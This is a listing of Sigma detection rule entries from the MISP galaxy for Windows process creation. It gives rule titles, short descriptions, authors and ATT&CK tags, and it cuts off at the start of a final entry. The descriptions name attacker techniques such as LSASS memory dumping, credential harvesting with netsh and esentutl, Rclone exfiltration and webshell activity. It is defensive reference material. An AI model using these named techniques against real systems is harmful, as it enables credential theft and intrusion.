Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"

Internal MISP references

UUID dee0a7a3-f200-4112-a99b-952196d81e42 which can be used as unique global reference for DumpMinitool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022/04/06
falsepositive ['Unknown']
filename proc_creation_win_dumpminitool_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Potential Rundll32 Execution With DLL Stored In ADS

Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).

Internal MISP references

UUID 9248c7e1-2bf3-4661-a22c-600a8040b446 which can be used as unique global reference for Potential Rundll32 Execution With DLL Stored In ADS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harjot Singh, '@cyb3rjy0t'
creation_date 2023/01/21
falsepositive ['Unknown']
filename proc_creation_win_rundll32_ads_stored_dll_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Electron Application CommandLine

Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.

Internal MISP references

UUID 378a05d8-963c-46c9-bcce-13c7657eac99 which can be used as unique global reference for Potentially Suspicious Electron Application CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/05
falsepositive ['Legitimate usage for debugging purposes']
filename proc_creation_win_susp_electron_execution_proxy.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

PUA - Rclone Execution

Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc

Internal MISP references

UUID e37db05d-d1f9-49c8-b464-cee1a4b11638 which can be used as unique global reference for PUA - Rclone Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group
creation_date 2021/05/10
falsepositive ['Unknown']
filename proc_creation_win_pua_rclone_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

Local File Read Using Curl.EXE

Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.

Internal MISP references

UUID aa6f6ea6-0676-40dd-b510-6e46f02d8867 which can be used as unique global reference for Local File Read Using Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/27
falsepositive ['Unknown']
filename proc_creation_win_curl_local_file_read.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Deleted Data Overwritten Via Cipher.EXE

Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives

Internal MISP references

UUID 4b046706-5789-4673-b111-66f25fe99534 which can be used as unique global reference for Deleted Data Overwritten Via Cipher.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/26
falsepositive ['Unknown']
filename proc_creation_win_cipher_overwrite_deleted_data.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1485']
Related clusters

To see the related clusters, click here.

PUA - Nmap/Zenmap Execution

Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation

Internal MISP references

UUID f6ecd1cf-19b8-4488-97f6-00f0924991a3 which can be used as unique global reference for PUA - Nmap/Zenmap Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Legitimate administrator activity']
filename proc_creation_win_pua_nmap_zenmap.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Unsigned AppX Installation Attempt Using Add-AppxPackage

Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages

Internal MISP references

UUID 37651c2a-42cd-4a69-ae0d-22a4349aa04a which can be used as unique global reference for Unsigned AppX Installation Attempt Using Add-AppxPackage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/31
falsepositive ['Installation of unsigned packages for testing purposes']
filename proc_creation_win_powershell_install_unsigned_appx_packages.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion']

Esentutl Gather Credentials

Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.

Internal MISP references

UUID 7df1713a-1a5b-4a4b-a071-dc83b144a101 which can be used as unique global reference for Esentutl Gather Credentials in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author sam0x90
creation_date 2021/08/06
falsepositive ['To be determined']
filename proc_creation_win_esentutl_params.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Suspicious Execution of Hostname

Use of hostname to get information

Internal MISP references

UUID 7be5fb68-f9ef-476d-8b51-0256ebece19e which can be used as unique global reference for Suspicious Execution of Hostname in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename proc_creation_win_hostname_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Process Access via TrolleyExpress Exclusion

Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory

Internal MISP references

UUID 4c0aaedc-154c-4427-ada0-d80ef9c9deb6 which can be used as unique global reference for Process Access via TrolleyExpress Exclusion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/10
falsepositive ['Unknown']
filename proc_creation_win_citrix_trolleyexpress_procdump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011', 'attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

PUA - NSudo Execution

Detects the use of NSudo tool for command execution

Internal MISP references

UUID 771d1eb5-9587-4568-95fb-9ec44153a012 which can be used as unique global reference for PUA - NSudo Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali
creation_date 2022/01/24
falsepositive ['Legitimate use by administrators']
filename proc_creation_win_pua_nsudo.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Suspicious GrpConv Execution

Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors

Internal MISP references

UUID f14e169e-9978-4c69-acb3-1cff8200bc36 which can be used as unique global reference for Suspicious GrpConv Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/19
falsepositive ['Unknown']
filename proc_creation_win_lolbin_susp_grpconv.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses

Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.

Internal MISP references

UUID a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 which can be used as unique global reference for RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/13
falsepositive ['Unknown']
filename proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

WMI Backdoor Exchange Transport Agent

Detects a WMI backdoor in Exchange Transport Agents via WMI event filters

Internal MISP references

UUID 797011dc-44f4-4e6f-9f10-a8ceefbe566b which can be used as unique global reference for WMI Backdoor Exchange Transport Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/11
falsepositive ['Unknown']
filename proc_creation_win_wmi_backdoor_exchange_transport_agent.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

Automated Collection Command Prompt

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

Internal MISP references

UUID f576a613-2392-4067-9d1a-9345fb58d8d1 which can be used as unique global reference for Automated Collection Command Prompt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/28
falsepositive ['Unknown']
filename proc_creation_win_susp_automated_collection.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1119', 'attack.credential_access', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Renamed Remote Utilities RAT (RURAT) Execution

Detects execution of renamed Remote Utilities (RURAT) via Product PE header field

Internal MISP references

UUID 9ef27c24-4903-4192-881a-3adde7ff92a5 which can be used as unique global reference for Renamed Remote Utilities RAT (RURAT) Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/19
falsepositive ['Unknown']
filename proc_creation_win_renamed_rurat.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.collection', 'attack.command_and_control', 'attack.discovery', 'attack.s0592']

Uncommon Child Process Spawned By Odbcconf.EXE

Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.

Internal MISP references

UUID 8e3c7994-131e-4ba5-b6ea-804d49113a26 which can be used as unique global reference for Uncommon Child Process Spawned By Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harjot Singh @cyb3rjy0t
creation_date 2023/05/22
falsepositive ['In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process', 'Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied.']
filename proc_creation_win_odbcconf_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Mavinject Inject DLL Into Running Process

Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag

Internal MISP references

UUID 4f73421b-5a0b-4bbf-a892-5a7fb99bea66 which can be used as unique global reference for Mavinject Inject DLL Into Running Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth
creation_date 2021/07/12
falsepositive ['Unknown']
filename proc_creation_win_lolbin_mavinject_process_injection.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055.001', 'attack.t1218.013']
Related clusters

To see the related clusters, click here.

AspNetCompiler Execution

Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.

Internal MISP references

UUID a01b8329-5953-4f73-ae2d-aa01e1f35f00 which can be used as unique global reference for AspNetCompiler Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/24
falsepositive ['Unknown']
filename proc_creation_win_aspnet_compiler_exectuion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Suspicious Msiexec Quiet Install From Remote Location

Detects usage of Msiexec.exe to install packages hosted remotely quietly

Internal MISP references

UUID 8150732a-0c9d-4a99-82b9-9efb9b90c40c which can be used as unique global reference for Suspicious Msiexec Quiet Install From Remote Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/28
falsepositive ['Unknown']
filename proc_creation_win_msiexec_install_remote.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007']
Related clusters

To see the related clusters, click here.

HackTool - Pypykatz Credentials Dumping Activity

Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored

Internal MISP references

UUID a29808fd-ef50-49ff-9c7a-59a9b040b404 which can be used as unique global reference for HackTool - Pypykatz Credentials Dumping Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/05
falsepositive ['Unknown']
filename proc_creation_win_hktl_pypykatz.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

HackTool - CreateMiniDump Execution

Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine

Internal MISP references

UUID 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d which can be used as unique global reference for HackTool - CreateMiniDump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/12/22
falsepositive ['Unknown']
filename proc_creation_win_hktl_createminidump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

File Download via CertOC.EXE

Detects when a user downloads a file by using CertOC.exe

Internal MISP references

UUID 70ad0861-d1fe-491c-a45f-fa48148a300d which can be used as unique global reference for File Download via CertOC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/16
falsepositive ['Unknown']
filename proc_creation_win_certoc_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Outlook EnableUnsafeClientMailRules Setting Enabled

Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros

Internal MISP references

UUID 55f0a3a1-846e-40eb-8273-677371b8d912 which can be used as unique global reference for Outlook EnableUnsafeClientMailRules Setting Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Nasreddine Bencherchali (Nextron Systems)
creation_date 2018/12/27
falsepositive ['Unknown']
filename proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.t1202']
Related clusters

To see the related clusters, click here.

RDP Port Forwarding Rule Added Via Netsh.EXE

Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule

Internal MISP references

UUID 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63 which can be used as unique global reference for RDP Port Forwarding Rule Added Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community
creation_date 2019/01/29
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_port_forwarding_3389.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.defense_evasion', 'attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

PowerShell Get-Clipboard Cmdlet Via CLI

Detects usage of the 'Get-Clipboard' cmdlet via CLI

Internal MISP references

UUID b9aeac14-2ffd-4ad3-b967-1354a4e628c3 which can be used as unique global reference for PowerShell Get-Clipboard Cmdlet Via CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/05/02
falsepositive ['Unknown']
filename proc_creation_win_powershell_get_clipboard.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1115']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Cabinet File Expansion

Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks

Internal MISP references

UUID 9f107a84-532c-41af-b005-8d12a607639f which can be used as unique global reference for Potentially Suspicious Cabinet File Expansion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj, X__Junior (Nextron Systems)
creation_date 2021/07/30
falsepositive ['System administrator Usage']
filename proc_creation_win_expand_cabinet_files.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Use Short Name Path in Command Line

Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection

Internal MISP references

UUID 349d891d-fef0-4fe4-bc53-eee623a15969 which can be used as unique global reference for Use Short Name Path in Command Line in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022/08/07
falsepositive ['Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process.']
filename proc_creation_win_susp_ntfs_short_name_path_use_cli.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Loaded Module Enumeration Via Tasklist.EXE

Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. In order to dump the process memory or perform other nefarious actions.

Internal MISP references

UUID 34275eb8-fa19-436b-b959-3d9ecd53fa1f which can be used as unique global reference for Loaded Module Enumeration Via Tasklist.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2024/02/12
falsepositive ['Unknown']
filename proc_creation_win_tasklist_module_enumeration.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1003']
Related clusters

To see the related clusters, click here.

Renamed Cloudflared.EXE Execution

Detects the execution of a renamed "cloudflared" binary.

Internal MISP references

UUID e0c69ebd-b54f-4aed-8ae3-e3467843f3f0 which can be used as unique global reference for Renamed Cloudflared.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/12/20
falsepositive ['Unknown']
filename proc_creation_win_renamed_cloudflared.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.001']
Related clusters

To see the related clusters, click here.

Chopper Webshell Process Pattern

Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells

Internal MISP references

UUID fa3c117a-bc0d-416e-a31b-0c0e80653efb which can be used as unique global reference for Chopper Webshell Process Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), MSTI (query)
creation_date 2022/10/01
falsepositive ['Unknown']
filename proc_creation_win_webshell_chopper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003', 'attack.t1018', 'attack.t1033', 'attack.t1087']
Related clusters

To see the related clusters, click here.

Potential Binary Proxy Execution Via VSDiagnostics.EXE

Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.

Internal MISP references

UUID ac1c92b4-ac81-405a-9978-4604d78cc47e which can be used as unique global reference for Potential Binary Proxy Execution Via VSDiagnostics.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/03
falsepositive ['Legitimate usage for tracing and diagnostics purposes']
filename proc_creation_win_vsdiagnostics_execution_proxy.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Signing Bypass Via Windows Developer Features

Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.

Internal MISP references

UUID a383dec4-deec-4e6e-913b-ed9249670848 which can be used as unique global reference for Potential Signing Bypass Via Windows Developer Features in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Process Memory Dump Via Comsvcs.DLL

Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)

Internal MISP references

UUID 646ea171-dded-4578-8a4d-65e9822892e3 which can be used as unique global reference for Process Memory Dump Via Comsvcs.DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/02/18
falsepositive ['Unlikely']
filename proc_creation_win_rundll32_process_dump_via_comsvcs.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.credential_access', 'attack.t1036', 'attack.t1003.001', 'car.2013-05-009']
Related clusters

To see the related clusters, click here.

PUA - WebBrowserPassView Execution

Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera

Internal MISP references

UUID d0dae994-26c6-4d2d-83b5-b3c8b79ae513 which can be used as unique global reference for PUA - WebBrowserPassView Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/20
falsepositive ['Legitimate use']
filename proc_creation_win_pua_webbrowserpassview.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.003']
Related clusters

To see the related clusters, click here.

User Discovery And Export Via Get-ADUser Cmdlet

Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file

Internal MISP references

UUID 1114e048-b69c-4f41-bc20-657245ae6e3f which can be used as unique global reference for User Discovery And Export Via Get-ADUser Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ["Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"]
filename proc_creation_win_powershell_user_discovery_get_aduser.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Potential Defense Evasion Via Rename Of Highly Relevant Binaries

Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.

Internal MISP references

UUID 0ba1da6d-b6ce-4366-828c-18826c9de23e which can be used as unique global reference for Potential Defense Evasion Via Rename Of Highly Relevant Binaries in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113
creation_date 2019/06/15
falsepositive ['Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist', "PsExec installed via Windows Store doesn't contain original filename field (False negative)"]
filename proc_creation_win_renamed_binary_highly_relevant.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003', 'car.2013-05-009']
Related clusters

To see the related clusters, click here.

HackTool - SafetyKatz Execution

Detects the execution of the hacktool SafetyKatz via PE information and default Image name

Internal MISP references

UUID b1876533-4ed5-4a83-90f3-b8645840a413 which can be used as unique global reference for HackTool - SafetyKatz Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/20
falsepositive ['Unlikely']
filename proc_creation_win_hktl_safetykatz.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Harvesting Of Wifi Credentials Via Netsh.EXE

Detect the harvesting of wifi credentials using netsh.exe

Internal MISP references

UUID 42b1a5b8-353f-4f10-b256-39de4467faff which can be used as unique global reference for Harvesting Of Wifi Credentials Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades), oscd.community
creation_date 2020/04/20
falsepositive ['Unknown']
filename proc_creation_win_netsh_wifi_credential_harvesting.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.credential_access', 'attack.t1040']
Related clusters

To see the related clusters, click here.

PUA - Advanced IP Scanner Execution

Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.

Internal MISP references

UUID bef37fa2-f205-4a7b-b484-0759bfd5f86f which can be used as unique global reference for PUA - Advanced IP Scanner Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy
creation_date 2020/05/12
falsepositive ['Legitimate administrative use']
filename proc_creation_win_pua_advanced_ip_scanner.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1046', 'attack.t1135']
Related clusters

To see the related clusters, click here.

IIS Native-Code Module Command Line Installation

Detects suspicious IIS native-code module installations via command line

Internal MISP references

UUID 9465ddf4-f9e4-4ebd-8d98-702df3a93239 which can be used as unique global reference for IIS Native-Code Module Command Line Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/12/11
falsepositive ['Unknown as it may vary from organisation to organisation how admins use to install IIS modules']
filename proc_creation_win_iis_appcmd_susp_module_install.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Rundll32 Activity

Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities

Internal MISP references

UUID e593cf51-88db-4ee1-b920-37e89012a3c9 which can be used as unique global reference for Potentially Suspicious Rundll32 Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/01/16
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_rundll32_susp_activity.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Suspicious SYSVOL Domain Group Policy Access

Detects Access to Domain Group Policies stored in SYSVOL

Internal MISP references

UUID 05f3c945-dcc8-4393-9f3d-af65077a8f86 which can be used as unique global reference for Suspicious SYSVOL Domain Group Policy Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Jonhnathan Ribeiro, oscd.community
creation_date 2018/04/09
falsepositive ['Administrative activity']
filename proc_creation_win_susp_sysvol_access.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Exports Critical Registry Keys To a File

Detects the export of a crital Registry key to a file.

Internal MISP references

UUID 82880171-b475-4201-b811-e9c826cd5eaa which can be used as unique global reference for Exports Critical Registry Keys To a File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Oddvar Moe, Sander Wiebing, oscd.community
creation_date 2020/10/12
falsepositive ['Dumping hives for legitimate purpouse i.e. backup or forensic investigation']
filename proc_creation_win_regedit_export_critical_keys.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1012']
Related clusters

To see the related clusters, click here.

Wab/Wabmig Unusual Parent Or Child Processes

Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity

Internal MISP references

UUID 63d1ccc0-2a43-4f4b-9289-361b308991ff which can be used as unique global reference for Wab/Wabmig Unusual Parent Or Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Unknown']
filename proc_creation_win_wab_unusual_parents.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

HackTool - Windows Credential Editor (WCE) Execution

Detects the use of Windows Credential Editor (WCE)

Internal MISP references

UUID 7aa7009a-28b9-4344-8c1f-159489a390df which can be used as unique global reference for HackTool - Windows Credential Editor (WCE) Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/12/31
falsepositive ['Another service that uses a single -s command line switch']
filename proc_creation_win_hktl_wce.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0005']
Related clusters

To see the related clusters, click here.

Suspicious ZipExec Execution

ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.

Internal MISP references

UUID 90dcf730-1b71-4ae7-9ffc-6fcf62bd0132 which can be used as unique global reference for Suspicious ZipExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/07
falsepositive ['Unknown']
filename proc_creation_win_hktl_zipexec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Execute Code with Pester.bat as Parent

